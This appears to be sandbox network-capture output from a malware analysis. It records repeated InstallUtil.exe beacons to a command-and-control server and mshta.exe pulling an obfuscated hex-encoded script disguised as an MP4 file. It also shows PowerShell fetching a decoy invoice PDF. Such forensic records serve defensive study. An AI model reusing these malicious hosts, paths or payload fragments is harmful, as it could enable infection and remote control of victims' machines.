123	192.168.2.11	50124	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:05.998171091 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:07.342350006 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:06 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.11	50125	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:07.641685963 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:08.903522015 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:08 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.11	50127	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:09.142242908 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:10.466367960 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:09 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.11	50128	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:10.700598001 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:12.025584936 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:11 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.11	50129	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:12.267744064 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:13.592029095 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:12 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.11	50130	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:13.826498985 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:15.153969049 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:14 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.11	50132	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:15.398107052 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:16.722296000 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:16 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.11	50133	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:16.951320887 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:18.277659893 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:17 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.11	50134	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:18.514223099 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:19.840451956 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:19 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.11	50135	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:20.089236021 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:21.404104948 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:21 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.11	50136	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:21.671061039 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:23.000010014 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:22 GMT Connection: close

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49709	104.21.48.1	443	8188	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:38:20 UTC	334	OUT	GET /3VKKE.mp4 HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: static.klipxuhaq.shop Connection: Keep-Alive
2024-12-17 07:38:21 UTC	909	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:38:21 GMT Content-Type: video/mp4 Content-Length: 352584 Connection: close Accept-Ranges: bytes ETag: "61eff840778583e9969afeda5ba02ef0" Last-Modified: Tue, 10 Dec 2024 19:02:11 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYacxqomLbx5VEPp%2FbcDRGYrBjDe74IZsv2DB0iZZ60D%2BqgpKer3q0h165UZin3bmNqhXZ5nAbxOi3hW5CEzY0liKIFhebccBvrpYno97ipdxUc85xtTNYZ8vJ4899oCtRB%2BnLHe3k4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3540c9ab46c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1464&rtt_var=565&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2872&recv_bytes=916&delivery_rate=1909744&cwnd=214&unsent_bytes=0&cid=424618af006f64d5&ts=589&x=0"
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 36 36 71 37 35 62 36 65 62 36 33 69 37 34 62 36 39 63 36 66 78 36 65 53 32 30 7a 34 61 77 35 33 59 35 38 4e 37 38 54 34 39 50 37 38 74 32 38 46 35 32 74 35 61 57 37 33 44 37 30 62 32 39 4b 37 62 70 37 36 4c 36 31 78 37 32 43 32 30 79 35 37 4a 37 33 74 36 32 78 35 36 6d 33 64 71 32 30 55 32 37 72 32 37 47 33 62 68 36 36 57 36 66 68 37 32 50 32 30 75 32 38 51 37 36 65 36 31 44 37 32 78 32 30 74 37 38 53 37 31 79 37 32 42 34 63 43 35 35 66 32 30 6e 33 64 77 32 30 55 33 30 47 33 62 71 37 38 41 37 31 41 37 32 51 34 63 64 35 35 66 32 30 63 33 63 54 32 30 45 35 32 56 35 61 4e 37 33 47 37 30 45 32 65 57 36 63 4d 36 35 69 36 65 58 36 37 59 37 34 65 36 38 63 33 62 6e 32 30 78 37 38 48 37 31 73 37 32 52 34 63 66 35 35 45 32 62 78 32 62 48 32 39 4e 37 62 4a 37 36 70 Data Ascii: 66q75b6eb63i74b69c6fx6eS20z4aw53Y58N78T49P78t28F52t5aW73D70b29K7bp76L61x72C20y57J73t62x56m3dq20U27r27G3bh66W6fh72P20u28Q76e61D72x20t78S71y72B4cC55f20n3dw20U30G3bq78A71A72Q4cd55f20c3cT20E52V5aN73G70E2eW6cM65i6eX67Y74e68c3bn20x78H71s72R4cf55E2bx2bH29N7bJ76p
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 63 68 33 33 4c 33 34 51 33 34 59 32 63 5a 33 32 6b 33 36 78 33 36 57 32 63 41 33 32 4a 33 37 4d 33 39 72 32 63 5a 33 33 71 33 34 46 33 39 6f 32 63 76 33 33 61 33 34 4b 33 36 49 32 63 6f 33 33 61 33 34 4e 33 32 5a 32 63 63 33 33 77 33 33 68 33 39 76 32 63 79 33 33 56 33 35 62 33 30 46 32 63 65 33 32 4d 33 36 70 33 36 46 32 63 71 33 32 48 33 37 6a 33 34 43 32 63 45 33 32 53 33 37 6d 33 30 74 32 63 64 33 33 79 33 31 41 33 39 45 32 63 79 33 33 71 33 35 73 33 32 55 32 63 6d 33 33 53 33 33 75 33 38 48 32 63 78 33 33 72 33 30 77 33 35 64 32 63 43 33 32 42 33 36 59 33 36 66 32 63 68 33 32 48 33 37 4d 33 39 4d 32 63 41 33 33 41 33 34 79 33 38 6e 32 63 71 33 33 48 33 33 44 33 35 56 32 63 6f 33 33 55 33 34 77 33 36 64 32 63 76 33 33 64 33 34 78 33 32 49 32 63 63 33 Data Ascii: ch33L34Q34Y2cZ32k36x36W2cA32J37M39r2cZ33q34F39o2cv33a34K36I2co33a34N32Z2cc33w33h39v2cy33V35b30F2ce32M36p36F2cq32H37j34C2cE32S37m30t2cd33y31A39E2cy33q35s32U2cm33S33u38H2cx33r30w35d2cC32B36Y36f2ch32H37M39M2cA33A34y38n2cq33H33D35V2co33U34w36d2cv33d34x32I2cc3
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 73 33 32 46 33 38 77 33 36 62 32 63 7a 33 32 53 33 38 6a 33 32 4d 32 63 52 33 33 6b 33 30 43 33 31 62 32 63 4a 33 32 54 33 38 76 33 37 4f 32 63 65 33 32 64 33 38 56 33 38 4f 32 63 44 33 32 41 33 38 6b 33 33 6e 32 63 62 33 32 65 33 39 79 33 31 49 32 63 42 33 32 43 33 38 6f 33 33 61 32 63 49 33 33 6d 33 30 45 33 33 66 32 63 78 33 32 56 33 38 6a 33 35 70 32 63 57 33 32 64 33 38 71 33 36 72 32 63 52 33 33 55 33 30 42 33 34 44 32 63 59 33 33 70 33 30 7a 33 30 68 32 63 4f 33 32 58 33 38 4e 33 39 72 32 63 55 33 33 4a 33 30 41 33 30 55 32 63 55 33 32 62 33 38 4c 33 34 50 32 63 76 33 33 62 33 30 53 33 32 58 32 63 4f 33 33 51 33 30 52 33 34 49 32 63 75 33 32 67 33 39 72 33 30 61 32 63 4b 33 32 74 33 38 56 33 39 48 32 63 64 33 32 75 33 38 6a 33 38 4c 32 63 43 33 32 Data Ascii: s32F38w36b2cz32S38j32M2cR33k30C31b2cJ32T38v37O2ce32d38V38O2cD32A38k33n2cb32e39y31I2cB32C38o33a2cI33m30E33f2cx32V38j35p2cW32d38q36r2cR33U30B34D2cY33p30z30h2cO32X38N39r2cU33J30A30U2cU32b38L34P2cv33b30S32X2cO33Q30R34I2cu32g39r30a2cK32t38V39H2cd32u38j38L2cC32
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 33 33 70 33 30 4e 33 32 62 32 63 6c 33 32 45 33 38 68 33 36 65 32 63 69 33 32 6f 33 38 6f 33 37 4d 32 63 57 33 33 49 33 30 50 33 34 65 32 63 75 33 32 7a 33 38 6d 33 36 72 32 63 47 33 32 4c 33 38 4c 33 35 46 32 63 61 33 32 4a 33 39 6f 33 30 4f 32 63 53 33 33 63 33 30 6e 33 32 63 32 63 77 33 32 53 33 38 52 33 33 73 32 63 45 33 32 42 33 38 41 33 37 66 32 63 69 33 33 6d 33 30 4a 33 32 44 32 63 43 33 32 70 33 38 65 33 37 58 32 63 69 33 32 6d 33 38 51 33 39 54 32 63 58 33 32 51 33 38 52 33 35 58 32 63 65 33 32 49 33 39 41 33 39 63 32 63 50 33 33 54 33 30 4d 33 30 46 32 63 42 33 32 4d 33 38 51 33 37 45 32 63 71 33 33 58 33 30 5a 33 33 73 32 63 7a 33 32 47 33 38 4a 33 36 54 32 63 42 33 32 48 33 39 44 33 30 6c 32 63 65 33 32 51 33 38 67 33 33 66 32 63 4c 33 32 54 Data Ascii: 33p30N32b2cl32E38h36e2ci32o38o37M2cW33I30P34e2cu32z38m36r2cG32L38L35F2ca32J39o30O2cS33c30n32c2cw32S38R33s2cE32B38A37f2ci33m30J32D2cC32p38e37X2ci32m38Q39T2cX32Q38R35X2ce32I39A39c2cP33T30M30F2cB32M38Q37E2cq33X30Z33s2cz32G38J36T2cB32H39D30l2ce32Q38g33f2cL32T
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 32 41 33 38 4e 33 37 59 32 63 4d 33 32 61 33 38 78 33 38 74 32 63 6f 33 32 6a 33 39 58 33 39 49 32 63 70 33 32 50 33 39 6c 33 30 76 32 63 6b 33 33 6a 33 30 56 33 31 4e 32 63 77 33 32 49 33 38 4d 33 37 4a 32 63 68 33 32 6f 33 39 76 33 30 47 32 63 57 33 33 64 33 30 5a 33 30 75 32 63 57 33 33 6c 33 30 54 33 34 77 32 63 5a 33 32 56 33 38 55 33 34 4e 32 63 59 33 33 61 33 30 44 33 30 73 32 63 6a 33 32 73 33 38 50 33 34 46 32 63 67 33 32 54 33 39 55 33 39 6d 32 63 6a 33 33 4c 33 30 76 33 32 59 32 63 6f 33 33 44 33 30 72 33 31 58 32 63 66 33 32 71 33 38 57 33 32 4c 32 63 4b 33 32 63 33 38 6d 33 32 44 32 63 76 33 32 6f 33 38 57 33 39 4f 32 63 50 33 33 48 33 30 6f 33 31 56 32 63 46 33 32 54 33 39 61 33 39 70 32 63 5a 33 32 71 33 38 5a 33 32 44 32 63 49 33 32 6d 33 Data Ascii: 2A38N37Y2cM32a38x38t2co32j39X39I2cp32P39l30v2ck33j30V31N2cw32I38M37J2ch32o39v30G2cW33d30Z30u2cW33l30T34w2cZ32V38U34N2cY33a30D30s2cj32s38P34F2cg32T39U39m2cj33L30v32Y2co33D30r31X2cf32q38W32L2cK32c38m32D2cv32o38W39O2cP33H30o31V2cF32T39a39p2cZ32q38Z32D2cI32m3
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 6d 33 30 5a 33 30 51 32 63 65 33 32 54 33 38 4c 33 36 52 32 63 4a 33 33 50 33 30 67 33 31 68 32 63 6c 33 33 58 33 30 6d 33 34 55 32 63 65 33 32 52 33 38 54 33 34 69 32 63 63 33 33 65 33 30 4b 33 30 4e 32 63 52 33 33 76 33 30 4e 33 32 71 32 63 4e 33 32 6b 33 39 6b 33 30 70 32 63 65 33 32 49 33 39 75 33 30 6a 32 63 64 33 32 62 33 38 65 33 32 48 32 63 68 33 32 69 33 38 54 33 38 76 32 63 6f 33 32 63 33 38 67 33 38 55 32 63 72 33 32 42 33 38 66 33 38 66 32 63 64 33 33 55 33 30 6f 33 30 62 32 63 63 33 33 4c 33 30 79 33 33 69 32 63 47 33 32 55 33 39 44 33 31 5a 32 63 65 33 32 71 33 39 43 33 30 63 32 63 63 33 32 44 33 38 71 33 32 43 32 63 6d 33 32 4c 33 39 42 33 30 74 32 63 4b 33 32 50 33 38 5a 33 32 6f 32 63 4f 33 32 73 33 38 79 33 35 4d 32 63 45 33 32 46 33 39 Data Ascii: m30Z30Q2ce32T38L36R2cJ33P30g31h2cl33X30m34U2ce32R38T34i2cc33e30K30N2cR33v30N32q2cN32k39k30p2ce32I39u30j2cd32b38e32H2ch32i38T38v2co32c38g38U2cr32B38f38f2cd33U30o30b2cc33L30y33i2cG32U39D31Z2ce32q39C30c2cc32D38q32C2cm32L39B30t2cK32P38Z32o2cO32s38y35M2cE32F39
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 33 39 6d 33 39 50 32 63 76 33 32 46 33 39 4c 33 39 75 32 63 79 33 32 46 33 38 70 33 36 4e 32 63 6c 33 33 66 33 30 43 33 33 58 32 63 63 33 32 62 33 38 65 33 34 64 32 63 50 33 32 79 33 38 62 33 39 49 32 63 50 33 32 4c 33 38 73 33 34 6a 32 63 51 33 32 57 33 38 69 33 38 59 32 63 4c 33 32 49 33 38 6c 33 37 76 32 63 44 33 32 56 33 38 57 33 36 63 32 63 58 33 32 51 33 38 61 33 36 49 32 63 6a 33 32 75 33 38 47 33 32 6d 32 63 65 33 32 69 33 38 54 33 34 66 32 63 47 33 32 70 33 39 55 33 31 68 32 63 4b 33 32 65 33 38 7a 33 32 6b 32 63 4e 33 32 63 33 38 65 33 37 62 32 63 58 33 33 51 33 30 43 33 34 63 32 63 75 33 33 48 33 30 55 33 33 48 32 63 46 33 33 42 33 30 47 33 30 79 32 63 59 33 32 53 33 38 5a 33 33 56 32 63 45 33 32 46 33 38 45 33 32 68 32 63 44 33 32 43 33 38 53 Data Ascii: 39m39P2cv32F39L39u2cy32F38p36N2cl33f30C33X2cc32b38e34d2cP32y38b39I2cP32L38s34j2cQ32W38i38Y2cL32I38l37v2cD32V38W36c2cX32Q38a36I2cj32u38G32m2ce32i38T34f2cG32p39U31h2cK32e38z32k2cN32c38e37b2cX33Q30C34c2cu33H30U33H2cF33B30G30y2cY32S38Z33V2cE32F38E32h2cD32C38S
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 30 55 33 32 4b 32 63 4c 33 32 72 33 39 4e 33 30 4e 32 63 55 33 32 50 33 38 79 33 34 79 32 63 56 33 33 6e 33 30 44 33 34 4e 32 63 55 33 32 50 33 38 4a 33 38 4a 32 63 62 33 33 49 33 30 4a 33 34 50 32 63 53 33 32 55 33 38 4d 33 34 58 32 63 58 33 32 46 33 38 6f 33 33 44 32 63 71 33 33 4d 33 30 43 33 33 44 32 63 44 33 32 44 33 39 76 33 30 4c 32 63 6d 33 32 54 33 38 77 33 33 44 32 63 58 33 33 6c 33 30 53 33 32 45 32 63 6a 33 32 56 33 38 69 33 36 4d 32 63 55 33 32 52 33 38 75 33 35 43 32 63 74 33 32 45 33 38 72 33 38 72 32 63 65 33 33 70 33 30 70 33 32 50 32 63 62 33 32 76 33 38 49 33 36 4a 32 63 6b 33 32 41 33 38 4a 33 35 52 32 63 55 33 32 79 33 38 57 33 37 49 32 63 4d 33 33 47 33 30 73 33 34 68 32 63 42 33 33 49 33 30 6e 33 33 43 32 63 57 33 32 62 33 38 6a 33 Data Ascii: 0U32K2cL32r39N30N2cU32P38y34y2cV33n30D34N2cU32P38J38J2cb33I30J34P2cS32U38M34X2cX32F38o33D2cq33M30C33D2cD32D39v30L2cm32T38w33D2cX33l30S32E2cj32V38i36M2cU32R38u35C2ct32E38r38r2ce33p30p32P2cb32v38I36J2ck32A38J35R2cU32y38W37I2cM33G30s34h2cB33I30n33C2cW32b38j3
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 6e 33 34 66 32 63 48 33 32 58 33 39 4e 33 30 79 32 63 6d 33 33 69 33 30 69 33 30 4b 32 63 7a 33 32 4c 33 38 6d 33 34 4f 32 63 50 33 33 72 33 30 74 33 31 6b 32 63 4f 33 33 57 33 30 49 33 31 68 32 63 77 33 33 66 33 30 42 33 30 79 32 63 56 33 32 58 33 39 75 33 31 54 32 63 43 33 32 72 33 38 4a 33 37 57 32 63 65 33 33 6e 33 30 6a 33 32 61 32 63 48 33 32 56 33 38 54 33 35 7a 32 63 47 33 33 42 33 30 51 33 30 6e 32 63 6f 33 32 5a 33 38 50 33 35 73 32 63 78 33 32 4c 33 39 7a 33 31 4c 32 63 4e 33 32 47 33 38 6a 33 37 63 32 63 57 33 33 50 33 30 63 33 31 50 32 63 6f 33 32 4f 33 38 49 33 33 48 32 63 42 33 32 51 33 38 6b 33 33 62 32 63 49 33 33 54 33 30 63 33 34 74 32 63 44 33 33 4a 33 30 61 33 30 76 32 63 4f 33 32 4e 33 38 4b 33 33 77 32 63 48 33 33 42 33 30 57 33 32 Data Ascii: n34f2cH32X39N30y2cm33i30i30K2cz32L38m34O2cP33r30t31k2cO33W30I31h2cw33f30B30y2cV32X39u31T2cC32r38J37W2ce33n30j32a2cH32V38T35z2cG33B30Q30n2co32Z38P35s2cx32L39z31L2cN32G38j37c2cW33P30c31P2co32O38I33H2cB32Q38k33b2cI33T30c34t2cD33J30a30v2cO32N38K33w2cH33B30W32
2024-12-17 07:38:21 UTC	1369	IN	Data Raw: 33 39 43 32 63 6c 33 32 6b 33 38 69 33 35 67 32 63 72 33 33 67 33 30 69 33 32 77 32 63 6f 33 32 65 33 38 4f 33 33 48 32 63 5a 33 33 61 33 30 7a 33 34 6d 32 63 72 33 32 5a 33 38 64 33 36 6b 32 63 58 33 33 43 33 30 72 33 33 7a 32 63 45 33 33 69 33 30 58 33 30 42 32 63 58 33 32 61 33 38 45 33 36 49 32 63 46 33 32 61 33 38 49 33 38 6a 32 63 71 33 32 5a 33 38 44 33 33 53 32 63 63 33 32 65 33 38 52 33 35 65 32 63 6e 33 33 57 33 30 75 33 30 62 32 63 46 33 33 41 33 30 74 33 33 69 32 63 76 33 32 6d 33 38 65 33 36 69 32 63 73 33 33 6a 33 30 62 33 31 4a 32 63 49 33 33 67 33 30 5a 33 31 4e 32 63 61 33 32 47 33 39 42 33 31 7a 32 63 52 33 32 51 33 38 77 33 38 53 32 63 56 33 32 4b 33 38 49 33 33 74 32 63 6c 33 32 4e 33 38 4d 33 39 69 32 63 6e 33 33 76 33 30 77 33 34 58 Data Ascii: 39C2cl32k38i35g2cr33g30i32w2co32e38O33H2cZ33a30z34m2cr32Z38d36k2cX33C30r33z2cE33i30X30B2cX32a38E36I2cF32a38I38j2cq32Z38D33S2cc32e38R35e2cn33W30u30b2cF33A30t33i2cv32m38e36i2cs33j30b31J2cI33g30Z31N2ca32G39B31z2cR32Q38w38S2cV32K38I33t2cl32N38M39i2cn33v30w34X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49723	83.166.133.91	443	1080	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:38:25 UTC	193	OUT	GET /pdf/cloudviewer/ref095vq842r70/3rd/party/authorisation/form/20241210/docs/w3/ref095vq842r70_3rd_party_authorisation_form.pdf HTTP/1.1 Host: csp-invoices-v5.com Connection: Keep-Alive
2024-12-17 07:38:26 UTC	324	IN	HTTP/1.1 200 OK date: Tue, 17 Dec 2024 07:38:26 GMT server: Apache strict-transport-security: max-age=16000000 upgrade: h2 connection: Upgrade last-modified: Tue, 10 Dec 2024 13:54:13 GMT etag: "f312-628ead0f031f3" accept-ranges: bytes content-length: 62226 vary: Accept-Encoding content-type: application/pdf
2024-12-17 07:38:26 UTC	14905	IN	Data Raw: 25 50 44 46 2d 31 2e 37 0a 25 ba d1 f1 a9 0a 31 34 20 30 20 6f 62 6a 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 32 32 32 36 2f 4f 20 31 37 2f 45 20 35 35 35 39 38 2f 4e 20 32 2f 54 20 36 31 39 32 31 2f 48 20 5b 20 38 30 32 20 33 30 30 5d 3e 3e 0a 65 6e 64 6f 62 6a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 31 35 20 30 20 6f 62 6a 3c 3c 2f 49 44 5b 3c 42 41 30 36 37 41 45 33 36 38 43 45 36 41 39 44 44 31 34 33 32 45 30 38 36 Data Ascii: %PDF-1.7%14 0 obj<</Linearized 1/L 62226/O 17/E 55598/N 2/T 61921/H [ 802 300]>>endobj 15 0 obj<</ID[<BA067AE368CE6A9DD1432E086
